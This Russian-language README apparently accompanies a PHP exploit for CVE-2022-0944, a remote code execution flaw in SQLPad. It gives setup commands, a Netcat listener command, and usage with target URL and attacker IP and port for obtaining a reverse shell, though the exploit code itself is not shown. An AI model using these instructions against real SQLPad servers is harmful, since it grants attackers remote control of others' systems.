
CVE-2022-0944 Эксплойт удалённого выполнения кода
Этот PHP-код предназначен для эксплуатации уязвимости Remote Code Execution (RCE) в SQLPad, связанной с CVE-2022-0944.
Он работает путём внедрения вредоносного кода в приложение SQLPad, заставляя его выполнять системную команду, открывающую обратную оболочку – соединение, предоставляющее атакующему удалённый контроль над уязвимой системой.
sudo apt-get install php-clisudo apt-get install php-curlЧтобы захватить соединение обратной оболочки, запустите Netcat на машине атакующего:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: Корневой URL уязвимого SQLPad (например, http://target.com:3000)
<attacker_ip>: IP-адрес атакующего, слушающий обратное соединение (тот же, что и IP Netcat)
<attacker_port>: Порт, на котором слушает атакующий (тот же, что и порт Netcat)
Оригинальная логика эксплойта была основана на этом репозитории:
Моей целью было понять логику эксплойта и переписать его на другом языке программирования в качестве личного вызова.
Дополнительная ссылка: 🔗 CVE-2022-0944 – NVD